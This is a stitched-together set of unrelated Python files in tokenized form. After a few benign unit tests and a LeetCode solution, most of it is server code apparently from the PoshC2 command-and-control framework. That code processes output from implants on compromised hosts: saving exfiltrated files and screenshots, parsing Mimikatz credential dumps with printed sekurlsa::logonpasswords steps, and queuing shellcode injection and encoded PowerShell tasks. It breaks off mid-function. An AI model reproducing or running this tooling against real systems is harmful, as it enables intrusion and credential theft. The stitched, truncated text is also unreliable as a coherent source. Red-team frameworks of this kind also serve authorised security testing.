<with_stmt>self.assertRaises(TurbiniaException)<block_start>archive.ValidateTarFile('blah.no')<block_end># Raise exception for a file with unsupported extension. <with_stmt>self.assertRaises(TurbiniaException)<block_start>archive.ValidateTarFile(self.tmp_files_dir)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
__all__=['a_star' 'best_first' 'bi_a_star' 'breadth_first' 'dijkstra' 'finder' 'ida_star']<line_sep>
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """ test Activations """<import_stmt>numpy<as>np<import_stmt>mindspore.nn<as>nn<import_from_stmt>mindspore Tensor<import_from_stmt>mindspore.common.api _cell_graph_executor<import_from_stmt>..ut_filter non_graph_engine<class_stmt>SoftmaxNet(nn.Cell)<block_start><def_stmt>__init__ self dim<block_start>super(SoftmaxNet self).__init__()<line_sep>self.softmax=nn.Softmax(dim)<block_end><def_stmt>construct self x<block_start><return>self.softmax(x)<block_end><block_end>@non_graph_engine<def_stmt>test_compile <block_start>net=SoftmaxNet(0)<line_sep>input_tensor=Tensor(np.array([[1.2 2.1] [2.2 3.2]] dtype=np.float32))<line_sep>net(input_tensor)<block_end>@non_graph_engine<def_stmt>test_compile_axis <block_start>net=SoftmaxNet(-1)<line_sep>prob=355<line_sep>input_data=np.random.randn(4 16 1 1).astype(np.float32)<times>prob<line_sep>input_tensor=Tensor(input_data)<line_sep>net(input_tensor)<block_end><class_stmt>LogSoftmaxNet(nn.Cell)<block_start><def_stmt>__init__ self dim<block_start>super(LogSoftmaxNet self).__init__()<line_sep>self.logsoftmax=nn.LogSoftmax(dim)<block_end><def_stmt>construct self x<block_start><return>self.logsoftmax(x)<block_end><block_end>@non_graph_engine<def_stmt>test_compile_logsoftmax <block_start>net=LogSoftmaxNet(0)<line_sep>input_tensor=Tensor(np.array([[1.2 2.1] [2.2 3.2]] dtype=np.float32))<line_sep>net(input_tensor)<block_end><class_stmt>Net1(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Net1 self).__init__()<line_sep>self.relu=nn.ReLU()<block_end><def_stmt>construct self x<block_start><return>self.relu(x)<block_end><block_end><def_stmt>test_compile_relu <block_start>net=Net1()<line_sep>input_data=Tensor(np.array([[1.2 2.1] [2.2 3.2]] dtype=np.float32))<line_sep>_cell_graph_executor.compile(net input_data)<block_end><class_stmt>Net_gelu(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Net_gelu self).__init__()<line_sep>self.gelu=nn.GELU()<block_end><def_stmt>construct self x<block_start><return>self.gelu(x)<block_end><block_end><def_stmt>test_compile_gelu <block_start>net=Net_gelu()<line_sep>input_data=Tensor(np.array([[1.2 2.1] [2.2 3.2]] dtype=np.float32))<line_sep>_cell_graph_executor.compile(net input_data)<block_end><class_stmt>NetLeakyReLU(nn.Cell)<block_start><def_stmt>__init__ self alpha<block_start>super(NetLeakyReLU self).__init__()<line_sep>self.leaky_relu=nn.LeakyReLU(alpha)<block_end><def_stmt>construct self x<block_start><return>self.leaky_relu(x)<block_end><block_end><def_stmt>test_compile_leaky_relu <block_start>net=NetLeakyReLU(alpha=0.1)<line_sep>input_data=Tensor(np.array([[1.6 0 0.6] [6 0 -6]] dtype=np.float32))<line_sep>_cell_graph_executor.compile(net input_data)<block_end>
<class_stmt>Solution(object)<block_start><def_stmt>reverseVowels self s<block_start>""" :type s: str :rtype: str """<line_sep>vowels=set("aeiouAEIOU")<line_sep>s=list(s)<line_sep>i=0<line_sep>j=len(s)-1<while_stmt>i<l>j<block_start><while_stmt>i<l>j<and>s[i]<not><in>vowels<block_start>i<augadd>1<block_end><while_stmt>i<l>j<and>s[j]<not><in>vowels<block_start>j<augsub>1<block_end><if_stmt>i<l>j<block_start>s[i],s[j]=s[j] s[i]<line_sep>i<augadd>1<line_sep>j<augsub>1<block_end><block_end><return>''.join(s)<block_end><block_end>
<import_from_stmt>nndet.evaluator.detection.froc FROCMetric<import_from_stmt>nndet.evaluator.detection.coco COCOMetric<import_from_stmt>nndet.evaluator.detection.hist PredictionHistogram<line_sep>
# Copyright 2017 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for tensorflow_transform.test_case."""<import_stmt>re<import_from_stmt>tensorflow_transform test_case<import_stmt>unittest<class_stmt>TftUnitTest(test_case.TransformTestCase)<block_start><def_stmt>testCrossNamedParameters self<block_start>test_cases_1=[{'testcase_name':'a_1_b_1' 'a':1 'b':1} {'testcase_name':'a_3_b_3' 'a':3 'b':3} ]<line_sep>test_cases_2=[{'testcase_name':'c_2' 'c':2} {'testcase_name':'c_4' 'c':4} ]<line_sep>expected_cross=[{'testcase_name':'a_1_b_1_c_2' 'a':1 'b':1 'c':2} {'testcase_name':'a_1_b_1_c_4' 'a':1 'b':1 'c':4} {'testcase_name':'a_3_b_3_c_2' 'a':3 'b':3 'c':2} {'testcase_name':'a_3_b_3_c_4' 'a':3 'b':3 'c':4} ]<line_sep>self.assertEqual(test_case.cross_named_parameters(test_cases_1 test_cases_2) expected_cross)<block_end><def_stmt>testCrossParameters self<block_start>test_cases_1=[('a' 1) ('b' 2)]<line_sep>test_cases_2=[(<true> ) (<false> )]<line_sep>expected_cross=[('a' 1 <true>) ('b' 2 <true>) ('a' 1 <false>) ('b' 2 <false>) ]<line_sep>self.assertCountEqual(test_case.cross_parameters(test_cases_1 test_cases_2) expected_cross)<block_end><def_stmt>testAssertDataCloseOrEqual self<block_start>self.assertDataCloseOrEqual([{'a':'first' 'b':1.0 'c':5 'd':('second' 2.0)} {'e':2 'f':3}] [{'a':'first' 'b':1.0000001 'c':5 'd':('second' 2.0000001)} {'e':2 'f':3}])<with_stmt>self.assertRaisesRegexp(AssertionError r'len\(.*\) != len\(\[\]\)')<block_start>self.assertDataCloseOrEqual([{'a':1}] [])<block_end><with_stmt>self.assertRaisesRegexp(AssertionError re.compile('Element counts were not equal.*: Row 0' re.DOTALL))<block_start>self.assertDataCloseOrEqual([{'a':1}] [{'b':1}])<block_end><with_stmt>self.assertRaisesRegexp(AssertionError re.compile('Not equal to tolerance.*: Row 0, key a' re.DOTALL))<block_start>self.assertDataCloseOrEqual([{'a':1}] [{'a':2}])<block_end><block_end>@test_case.parameters((1 'a') (2 'b'))<def_stmt>testSampleParametrizedTestMethod self my_arg my_other_arg<block_start>self.assertIn((my_arg my_other_arg) {(1 'a') (2 'b')})<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
<import_from_stmt>decimal Decimal<import_from_stmt>unittest TestCase<import_from_stmt>hummingbot.core.utils.fixed_rate_source FixedRateSource<class_stmt>FixedRateSourceTests(TestCase)<block_start><def_stmt>test_look_for_unconfigured_pair_rate self<block_start>rate_source=FixedRateSource()<line_sep>self.assertIsNone(rate_source.rate("BTC-USDT"))<block_end><def_stmt>test_get_rate self<block_start>rate_source=FixedRateSource()<line_sep>rate_source.add_rate("BTC-USDT" Decimal(40000))<line_sep>self.assertEqual(rate_source.rate("BTC-USDT") Decimal(40000))<block_end><def_stmt>test_get_rate_when_inverted_pair_is_configured self<block_start>rate_source=FixedRateSource()<line_sep>rate_source.add_rate("BTC-USDT" Decimal(40000))<line_sep>self.assertEqual(rate_source.rate("USDT-BTC") Decimal(1)/Decimal(40000))<block_end><def_stmt>test_string_representation self<block_start>self.assertEqual(str(FixedRateSource()) "fixed rates")<block_end><block_end>
<import_stmt>datetime hashlib base64 traceback os re<import_stmt>poshc2.server.database.DB<as>DB<import_from_stmt>poshc2.Colours Colours<import_from_stmt>poshc2.server.Config ModulesDirectory DownloadsDirectory ReportsDirectory<import_from_stmt>poshc2.server.Implant Implant<import_from_stmt>poshc2.server.Core decrypt encrypt default_response decrypt_bytes_gzip number_of_days process_mimikatz print_bad<import_from_stmt>poshc2.server.Core load_module load_module_sharp encrypt default_response<import_from_stmt>poshc2.server.payloads.Payloads Payloads<import_from_stmt>poshc2.server.PowerStatus translate_power_status<import_from_stmt>poshc2.Utils randomuri<def_stmt>newTaskOutput uriPath cookieVal post_data wsclient=<false><block_start>now=datetime.datetime.now()<line_sep>all_implants=DB.get_implants_all()<if_stmt><not>all_implants<block_start>print_bad("Received post request but no implants in database... has the project been cleaned but you're using the same URLs?")<line_sep><return><block_end><for_stmt>implant all_implants<block_start>implantID=implant.ImplantID<line_sep>RandomURI=implant.RandomURI<line_sep>Hostname=implant.Hostname<line_sep>encKey=implant.Key<line_sep>Domain=implant.Domain<line_sep>User=implant.User<line_sep>implant_type=implant.Pivot<if_stmt>RandomURI<in>uriPath<and>cookieVal<block_start>DB.update_implant_lastseen(now.strftime("%Y-%m-%d %H:%M:%S") RandomURI)<line_sep>decCookie=decrypt(encKey cookieVal)<if_stmt>implant_type<eq>"JXA"<block_start>rawoutput=decrypt(encKey post_data[1500:])<block_end><else_stmt><block_start>rawoutput=decrypt_bytes_gzip(encKey post_data[1500:])<block_end><if_stmt>decCookie.startswith("Error")<block_start>print(Colours.RED)<line_sep>print("The multicmd errored: ")<line_sep>print(rawoutput)<line_sep>print(Colours.GREEN)<line_sep><return><block_end>cookieMsg=""<if_stmt>"-"<in>decCookie<block_start>decCookie=decCookie.strip('\x00')<line_sep>splt=decCookie.split("-")<if_stmt><not>splt[0].isdigit()<block_start>print(Colours.RED+"[!] 
Cookie %s is invalid"%decCookie+Colours.GREEN)<line_sep><return><block_end><else_stmt><block_start>taskId=str(int(splt[0]))<line_sep>cookieMsg=splt[1]<block_end><block_end><else_stmt><block_start>taskId=str(int(decCookie.strip('\x00')))<block_end>taskIdStr="0"<times>(5-len(str(taskId)))+str(taskId)<if_stmt>taskId<ne>"99999"<block_start>executedCmd=DB.get_cmd_from_task_id(taskId)<line_sep>task_owner=DB.get_task_owner(taskId)<block_end><else_stmt><block_start>print(Colours.END)<line_sep>timenow=now.strftime("%Y-%m-%d %H:%M:%S")<line_sep>print(f"Background task against implant {implantID} on host {Domain}\\{User} @ {Hostname} ({timenow}) (output appended to %sbackground-data.txt)"%ReportsDirectory)<line_sep>print(Colours.GREEN)<line_sep>print(rawoutput)<line_sep>miscData=open(("%sbackground-data.txt"%ReportsDirectory) "a+")<line_sep>miscData.write(rawoutput)<line_sep><return><block_end>print(Colours.GREEN)<if_stmt>task_owner<is><not><none><block_start>print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)"%(taskIdStr task_owner implantID Domain User Hostname now.strftime("%Y-%m-%d %H:%M:%S")))<block_end><else_stmt><block_start>print("Task %s returned against implant %s on host %s\\%s @ %s (%s)"%(taskIdStr implantID Domain User Hostname now.strftime("%Y-%m-%d %H:%M:%S")))<block_end><try_stmt><block_start>outputParsed=re.sub(r'123456(.+?)654321' '' rawoutput)<line_sep>outputParsed=outputParsed.rstrip()<block_end><except_stmt>Exception<block_start><pass><block_end><if_stmt>cookieMsg<is><not><none><and>cookieMsg.lower().startswith("pwrstatusmsg")<block_start>translate_power_status(outputParsed RandomURI)<line_sep><return><block_end><if_stmt>"loadmodule"<in>executedCmd<and>len(outputParsed.split())<eq>0<block_start>print("Module loaded successfully")<line_sep>DB.update_task(taskId "Module loaded successfully")<block_end><elif_stmt>"pbind-connect "<in>executedCmd<and>"PBind-Connected"<in>outputParsed<or>"PBind PBind start"<in>executedCmd<and>"PBind-Connected"<in>outputParsed<block_start>outputParsed=re.search("PBind-Connected:.*" outputParsed)<line_sep>outputParsed=outputParsed[0].replace("PBind-Connected: " "")<line_sep>Domain,User,Hostname,Arch,PID,Proxy=str(outputParsed).split(";")<line_sep>Proxy=Proxy.replace("\x00" "")<if_stmt>"\\"<in>User<block_start>User=User[User.index("\\")+1:]<block_end>PivotString="C# PBind"<if_stmt>"pbind-command run-exe PBind PBind start"<in>executedCmd<block_start>PivotString="C# PBind Pivot"<block_end>newImplant=Implant(implantID PivotString str(Domain) str(User) str(Hostname) Arch PID <none>)<line_sep>newImplant.save()<line_sep>newImplant.display()<line_sep>newImplant.autoruns()<if_stmt>"pbind-command run-exe PBind PBind start"<in>executedCmd<block_start>DB.new_task("pbind-pivot-loadmodule Stage2-Core.exe" "autoruns" RandomURI)<block_end><else_stmt><block_start>DB.new_task("pbind-loadmodule Stage2-Core.exe" "autoruns" RandomURI)<block_end><block_end><elif_stmt>"fcomm-connect "<in>executedCmd<and>"FComm-Connected"<in>outputParsed<block_start>outputParsed=re.search("FComm-Connected:.*" outputParsed)<line_sep>outputParsed=outputParsed[0].replace("FComm-Connected: " "")<line_sep>Domain,User,Hostname,Arch,PID,Proxy=str(outputParsed).split(";")<line_sep>Proxy=Proxy.replace("\x00" "")<if_stmt>"\\"<in>User<block_start>User=User[User.index("\\")+1:]<block_end>newImplant=Implant(implantID "C# FComm" str(Domain) str(User) str(Hostname) Arch PID 
<none>)<line_sep>newImplant.save()<line_sep>newImplant.display()<line_sep>newImplant.autoruns()<line_sep>DB.new_task("fcomm-loadmodule Stage2-Core.exe" "autoruns" RandomURI)<block_end><elif_stmt>executedCmd.lower().startswith("beacon ")<block_start>new_sleep=executedCmd.replace('beacon ' '').strip()<line_sep>DB.update_sleep(new_sleep RandomURI)<block_end><elif_stmt>"get-screenshot"<in>executedCmd.lower()<block_start><try_stmt><block_start>decoded=base64.b64decode(outputParsed)<line_sep>filename=implant.User+"-"+now.strftime("%m%d%Y%H%M%S_"+randomuri())<line_sep>output_file=open('%s%s.png'%(DownloadsDirectory filename) 'wb')<line_sep>print("Screenshot captured: %s%s.png"%(DownloadsDirectory filename))<line_sep>DB.update_task(taskId "Screenshot captured: %s%s.png"%(DownloadsDirectory filename))<line_sep>output_file.write(decoded)<line_sep>output_file.close()<block_end><except_stmt>Exception<block_start>DB.update_task(taskId "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")<line_sep>print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")<block_end><block_end><elif_stmt>(executedCmd.lower().startswith("$shellcode64"))<or>(executedCmd.lower().startswith("$shellcode64"))<block_start>DB.update_task(taskId "Upload shellcode complete")<line_sep>print("Upload shellcode complete")<block_end><elif_stmt>(executedCmd.lower().startswith("run-exe core.program core inject-shellcode"))<or>(executedCmd.lower().startswith("pbind-command run-exe core.program core inject-shellcode"))<or>(executedCmd.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode"))<block_start>DB.update_task(taskId "Upload shellcode complete")<line_sep>print(outputParsed)<block_end><elif_stmt>"download-file"<in>executedCmd.lower()<block_start><try_stmt><block_start>filename=executedCmd.lower().replace("download-files " "")<line_sep>filename=filename.replace("download-file " "")<line_sep>filename=filename.replace("-source " "")<line_sep>filename=filename.replace(".." 
"")<line_sep>filename=filename.replace("'" "")<line_sep>filename=filename.replace('"' "")<line_sep>filename=filename.replace("\\" "/")<line_sep>directory,filename=filename.rsplit('/' 1)<line_sep>filename=filename.rstrip('\x00')<line_sep>original_filename=filename.strip()<if_stmt><not>original_filename<block_start>directory=directory.rstrip('\x00')<line_sep>directory=directory.replace("/" "_").replace("\\" "_").strip()<line_sep>original_filename=directory<block_end><try_stmt><block_start><if_stmt>rawoutput.startswith("Error")<block_start>print("Error downloading file: ")<line_sep>print(rawoutput)<line_sep><break><block_end>chunkNumber=rawoutput[:5]<line_sep>totalChunks=rawoutput[5:10]<block_end><except_stmt>Exception<block_start>chunkNumber=rawoutput[:5].decode("utf-8")<line_sep>totalChunks=rawoutput[5:10].decode("utf-8")<block_end><if_stmt>(chunkNumber<eq>"00001")<and>os.path.isfile('%s%s'%(DownloadsDirectory filename))<block_start>counter=1<while_stmt>(os.path.isfile('%s%s'%(DownloadsDirectory filename)))<block_start><if_stmt>'.'<in>filename<block_start>filename=original_filename[:original_filename.rfind('.')]+'-'+str(counter)+original_filename[original_filename.rfind('.'):]<block_end><else_stmt><block_start>filename=original_filename+'-'+str(counter)<block_end>counter<augadd>1<block_end><block_end><if_stmt>(chunkNumber<ne>"00001")<block_start>counter=1<if_stmt><not>os.path.isfile('%s%s'%(DownloadsDirectory filename))<block_start>print("Error trying to download part of a file to a file that does not exist: %s"%filename)<block_end><while_stmt>(os.path.isfile('%s%s'%(DownloadsDirectory filename)))# First find the 'next' file would be downloaded to <block_start><if_stmt>'.'<in>filename<block_start>filename=original_filename[:original_filename.rfind('.')]+'-'+str(counter)+original_filename[original_filename.rfind('.'):]<block_end><else_stmt><block_start>filename=original_filename+'-'+str(counter)<block_end>counter<augadd>1<block_end><if_stmt>counter<ne>2# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter <block_start><if_stmt>'.'<in>filename<block_start>filename=original_filename[:original_filename.rfind('.')]+'-'+str(counter-2)+original_filename[original_filename.rfind('.'):]<block_end><else_stmt><block_start>filename=original_filename+'-'+str(counter-2)<block_end><block_end><else_stmt><block_start>filename=original_filename<block_end><block_end>print("Download file part %s of %s to: %s"%(chunkNumber totalChunks filename))<line_sep>DB.update_task(taskId "Download file part %s of %s to: %s"%(chunkNumber totalChunks filename))<line_sep>output_file=open('%s%s'%(DownloadsDirectory filename) 'ab')<try_stmt><block_start>output_file.write(rawoutput[10:])<block_end><except_stmt>Exception<block_start>output_file.write(rawoutput[10:].encode("utf-8"))<block_end>output_file.close()<block_end><except_stmt>Exception<as>e<block_start>DB.update_task(taskId "Error downloading file %s "%e)<line_sep>print("Error downloading file %s "%e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>"safetydump"<in>executedCmd.lower()<block_start>rawoutput=decrypt_bytes_gzip(encKey post_data[1500:])<if_stmt>rawoutput.startswith("[-]")<or>rawoutput.startswith("ErrorCmd")<block_start>DB.update_task(taskId rawoutput)<line_sep>print(rawoutput)<block_end><else_stmt><block_start>dumpname="SafetyDump-Task-%s.b64"%taskIdStr<line_sep>dumppath="%s%s"%(DownloadsDirectory dumpname)<line_sep>open(dumppath 'w').write(rawoutput)<line_sep>message="Dump written to: 
%s"%dumppath<line_sep>message=message+"\n The base64 blob needs decoding, e.g. on Windows to use Mimikatz:"<line_sep>message=message+"\n $filename = '.\\%s'"%dumpname<line_sep>message=message+"\n $b64 = Get-Content $filename"<line_sep>message=message+"\n $bytes = [System.Convert]::FromBase64String($b64)"<line_sep>message=message+"\n [io.file]::WriteAllBytes(((Get-Item -Path \".\\\").FullName) + '\\safetydump.dmp', $bytes)"<line_sep>message=message+"\n ./mimikatz.exe"<line_sep>message=message+"\n sekurlsa::minidump safetydump.dmp"<line_sep>message=message+"\n sekurlsa::logonpasswords"<line_sep>message=message+"\nOr to just decode on Linux:"<line_sep>message=message+f"\n base64 -id {dumpname} > dump.bin"<line_sep>DB.update_task(taskId message)<line_sep>print(message)<block_end><block_end><elif_stmt>(executedCmd.lower().startswith("run-exe safetykatz")<or>"invoke-mimikatz"<in>executedCmd<or>executedCmd.lower().startswith("pbind-")<or>executedCmd.lower().startswith("fcomm-command")<or>executedCmd.lower().startswith("run-dll sharpsploit"))<and>"logonpasswords"<in>outputParsed.lower()<block_start>print("Parsing Mimikatz Output")<line_sep>DB.update_task(taskId outputParsed)<line_sep>process_mimikatz(outputParsed)<line_sep>print(Colours.GREEN)<line_sep>print(outputParsed+Colours.END)<block_end><else_stmt><block_start>DB.update_task(taskId outputParsed)<line_sep>print(Colours.GREEN)<line_sep>print(outputParsed+Colours.END)<block_end><block_end><block_end><block_end><def_stmt>newTask path<block_start>all_implants=DB.get_implants_all()<line_sep>commands=""<if_stmt>all_implants<block_start><for_stmt>i all_implants<block_start>RandomURI=i.RandomURI<line_sep>Pivot=i.Pivot<line_sep>EncKey=i.Key<line_sep>tasks=DB.get_newtasks(RandomURI)<if_stmt>RandomURI<in>path<and>tasks<block_start><for_stmt>task tasks<block_start>command=task[2]<line_sep>user=task[3]<line_sep>user_command=command<line_sep>implant=DB.get_implantbyrandomuri(RandomURI)<line_sep>implant_type=DB.get_implanttype(RandomURI)<line_sep>now=datetime.datetime.now()<if_stmt>(command.lower().startswith("$shellcode64"))<or>(command.lower().startswith("$shellcode86")<or>command.lower().startswith("run-exe core.program core inject-shellcode")<or>command.lower().startswith("run-exe pbind pbind run-exe core.program core inject-shellcode")<or>command.lower().startswith("pbind-command run-exe core.program core inject-shellcode")<or>command.lower().startswith("pbind-pivot-command run-exe core.program core inject-shellcode"))<block_start>user_command="Inject Shellcode: %s"%command[command.index("#")+1:]<line_sep>command=command[:command.index("#")]<block_end><elif_stmt>(command.lower().startswith("run-jxa "))<or>(command.lower().startswith("clipboard-monitor "))<or>(command.lower().startswith("cred-popper "))<block_start>user_command=command[:command.index("#")]<line_sep>command="run-jxa "+command[command.index("#")+1:]<block_end><elif_stmt>(command.lower().startswith('upload-file')<or>command.lower().startswith('pbind-command upload-file')<or>command.lower().startswith('fcomm-command upload-file'))<block_start>PBind=<false><line_sep>FComm=<false><if_stmt>command.lower().startswith('pbind-command upload-file')<block_start>PBind=<true><block_end><if_stmt>command.lower().startswith('fcomm-command upload-file')<block_start>FComm=<true><block_end>upload_args=command.replace('pbind-command upload-file' '').replace('fcomm-command upload-file' '').replace('upload-file' 
'')<line_sep>upload_file_args_split=upload_args.split()<if_stmt>len(upload_file_args_split)<l>2<block_start>print(Colours.RED)<line_sep>print("Error parsing upload command: %s"%upload_args)<line_sep>print(Colours.GREEN)<line_sep><continue><block_end>upload_file=upload_file_args_split[0]<line_sep>upload_file_destination=upload_file_args_split[1]<line_sep>upload_args=upload_args.replace(upload_file '')<line_sep>upload_args=upload_args.replace(upload_file_destination '')<with_stmt>open(upload_file "rb")<as>f<block_start>upload_file_bytes=f.read()<block_end><if_stmt><not>upload_file_bytes<block_start>print(Colours.RED+f"Error, no bytes read from the upload file, removing task: {upload_file}"+Colours.GREEN)<line_sep>DB.del_newtasks(str(task[0]))<line_sep><continue><block_end>upload_file_bytes_b64=base64.b64encode(upload_file_bytes).decode("utf-8")<if_stmt>implant_type.lower().startswith('c#')<block_start>command=f"upload-file {upload_file_bytes_b64};\"{upload_file_destination}\" {upload_args}"<block_end><elif_stmt>implant_type.lower().startswith('ps')<block_start>command=f"Upload-File -Destination \"{upload_file_destination}\" -Base64 {upload_file_bytes_b64} {upload_args}"<block_end><elif_stmt>implant_type.lower().startswith('py')<block_start>command=f"upload-file \"{upload_file_destination}\":{upload_file_bytes_b64} {upload_args}"<block_end><elif_stmt>implant_type.lower().startswith('jxa')<block_start>command=f"upload-file {upload_file_destination}:{upload_file_bytes_b64} {upload_args}"<block_end><else_stmt><block_start>print(Colours.RED)<line_sep>print("Error parsing upload command: %s"%upload_args)<line_sep>print(Colours.GREEN)<block_end><if_stmt>PBind<block_start>command=f"pbind-command {command}"<block_end><if_stmt>FComm<block_start>command=f"fcomm-command {command}"<block_end>filehash=hashlib.md5(base64.b64decode(upload_file_bytes_b64)).hexdigest()<line_sep>user_command=f"Uploading file: {upload_file} to {upload_file_destination} with md5sum: {filehash}"<block_end>taskId=DB.insert_task(RandomURI user_command user)<line_sep>taskIdStr="0"<times>(5-len(str(taskId)))+str(taskId)<if_stmt>len(str(taskId))<g>5<block_start><raise>ValueError('Task ID is greater than 5 characters which is not supported.')<block_end>print(Colours.YELLOW)<if_stmt>user<is><not><none><and>user<ne>""<block_start>print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)"%(taskIdStr user implant.ImplantID implant.Domain implant.User implant.Hostname now.strftime("%Y-%m-%d %H:%M:%S")))<block_end><else_stmt><block_start>print("Task %s issued against implant %s on host %s\\%s @ %s (%s)"%(taskIdStr implant.ImplantID implant.Domain implant.User implant.Hostname now.strftime("%Y-%m-%d %H:%M:%S")))<block_end><try_stmt><block_start><if_stmt>(user_command.lower().startswith("run-exe sharpwmi.program sharpwmi action=execute")<or>user_command.lower().startswith("pbind-command run-exe sharpwmi.program sharpwmi action=execute")<or>user_command.lower().startswith("fcomm-command run-exe sharpwmi.program sharpwmi action=execute"))<block_start>print(user_command[0:200])<line_sep>print("----TRUNCATED----")<block_end><else_stmt><block_start>print(user_command)<block_end>print(Colours.END)<block_end><except_stmt>Exception<as>e<block_start>print("Cannot print output: %s"%e)<block_end><if_stmt>task[2].startswith("loadmodule ")<block_start><try_stmt><block_start>module_name=(task[2]).replace("loadmodule " 
"")<if_stmt>".exe"<in>module_name<block_start>modulestr=load_module_sharp(module_name)<block_end><elif_stmt>".dll"<in>module_name<block_start>modulestr=load_module_sharp(module_name)<block_end><else_stmt><block_start>modulestr=load_module(module_name)<block_end>command="loadmodule%s"%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>command=""<block_end><block_end><elif_stmt>task[2].startswith("run-exe Program PS ")<block_start><try_stmt><block_start>cmd=(task[2]).replace("run-exe Program PS " "")<line_sep>modulestr=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>command="run-exe Program PS %s"%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-pivot-command run-exe Program PS ")<block_start><try_stmt><block_start>cmd=(task[2]).replace("pbind-pivot-command run-exe Program PS " "")<line_sep>base64string=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>modulestr=base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")<line_sep>doublebase64string=base64.b64encode(f"run-exe PBind PBind {modulestr}".encode("utf-8")).decode("utf-8")<line_sep>command="run-exe PBind PBind %s"%doublebase64string<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-command run-exe Program PS ")<block_start><try_stmt><block_start>cmd=(task[2]).replace("pbind-command run-exe Program PS " "")<line_sep>base64string=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>modulestr=base64.b64encode(f"run-exe Program PS {base64string}".encode("utf-8")).decode("utf-8")<line_sep>command="run-exe PBind PBind %s"%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("fcomm-command run-exe Program PS ")<block_start><try_stmt><block_start>cmd=(task[2]).replace("fcomm-command run-exe Program PS " "")<line_sep>modulestr=base64.b64encode(cmd.encode("utf-8")).decode("utf-8")<line_sep>command="run-exe FComm.FCClass FComm run-exe Program PS %s"%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot base64 the command for PS")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pslo ")<block_start><try_stmt><block_start>module_name=(task[2]).replace("pslo " "")<for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe Program PS loadmodule%s"%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-pslo")<block_start><try_stmt><block_start>module_name=(task[2]).replace("pbind-pslo " "")<for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe PBind PBind \"run-exe 
Program PS loadmodule%s\""%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-pivot-loadmodule ")<block_start><try_stmt><block_start>module_name=(task[2]).replace("pbind-pivot-loadmodule " "")<if_stmt>".exe"<in>module_name<or>".dll"<in>module_name<block_start><for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>base64string=base64.b64encode(f"run-exe PBind PBind \"loadmodule{modulestr}\"".encode("utf-8")).decode("utf-8")<line_sep>command=f"run-exe PBind PBind {base64string}"<block_end><block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("fcomm-pslo")<block_start><try_stmt><block_start>module_name=(task[2]).replace("fcomm-pslo " "")<for_stmt>modname os.listdir(ModulesDirectory)<block_start><if_stmt>modname.lower()<in>module_name.lower()<block_start>module_name=modname<block_end><block_end>modulestr=load_module_sharp(module_name)<line_sep>command="run-exe FComm.FCClass FComm \"run-exe Program PS loadmodule%s\""%modulestr<block_end><except_stmt>Exception<as>e<block_start>print("Cannot find module, loadmodule is case sensitive!")<line_sep>print(e)<line_sep>traceback.print_exc()<block_end><block_end><elif_stmt>task[2].startswith("pbind-loadmodule ")<block_start><try_stmt><block_start>module_name=(task[2]).replace("pbind-loadmodule " "")<if_stmt>".exe"<in>module_name<block_start><for_stmt>modname 